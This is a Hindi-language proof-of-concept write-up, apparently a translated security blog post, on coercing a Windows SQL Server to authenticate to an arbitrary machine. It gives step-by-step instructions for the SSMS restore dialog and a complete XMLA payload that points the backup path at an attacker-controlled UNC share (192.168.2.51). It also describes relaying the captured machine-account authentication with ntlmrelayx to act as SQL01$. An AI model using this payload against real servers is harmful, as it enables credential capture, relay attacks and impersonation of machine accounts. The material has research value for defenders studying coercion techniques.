
एक तकनीक जो Windows SQL Server को किसी भी मनमानी मशीन पर प्रमाणित (authenticate) होने के लिए बाध्य करती है।

किसी विंडोज़ SQL सर्वर को किसी मनमानी मशीन पर प्रमाणित करने के लिए विवश करने की एक तकनीक।
यह प्रूफ ऑफ कॉन्सेप्ट निम्नलिखित द्वारा सह-लेखित है:
स्थानीय मशीन खाते के रूप में प्रमाणीकरण ट्रिगर करने के लिए, हमें उपयोगकर्ता क्रेडेंशियल्स का उपयोग करके रिमोट SQL सर्वर से कनेक्ट करना होगा:

फिर हम किसी दिए गए फ़ाइल से डेटाबेस को पुनर्स्थापित करने के लिए "Restore" चुनेंगे।

XMLA फ़ाइल उत्पन्न करने के लिए, "Backup File" फ़ॉर्म में किसी यादृच्छिक फ़ाइल का पथ डालें, और Ok पर क्लिक करें।

फिर किसी यादृच्छिक फ़ाइल के पथ को बदलें और इसे अपने हमलावर सर्वर के UNC पथ से बदलें (उदाहरण के लिए \\192.168.128\SYSVOL\db.abf)

प्रूफ ऑफ कॉन्सेप्ट XMLA क्वेरी (poc.xmla):
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
<File>\\192.168.2.51\SYSVOL\db.abf</File>
<DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
<DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>
और हमें SQL सर्वर के स्थानीय मशीन खाते से एक प्रमाणीकरण प्राप्त होता है:

एक बार प्रमाणीकरण मिल जाने पर, हम इसे ntlmrelayx के साथ रिले कर सकते हैं ताकि कंप्यूटर SQL01$ की ओर से कई कार्य कर सकें।
यह बढ़िया है, लेकिन Linux हमलावर मशीन से इस जबरन प्रमाणीकरण को ट्रिगर करना जटिल है, क्योंकि हमारे पास SQL Server Management Studio (SSMS) तक पहुंच नहीं है।